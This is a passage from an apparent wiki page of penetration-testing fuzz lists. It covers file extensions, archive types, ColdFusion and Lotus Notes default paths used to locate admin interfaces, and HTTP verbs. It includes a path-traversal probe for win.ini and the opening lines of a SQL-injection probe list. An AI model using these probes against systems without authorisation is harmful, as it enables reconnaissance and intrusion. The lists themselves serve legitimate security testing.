.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
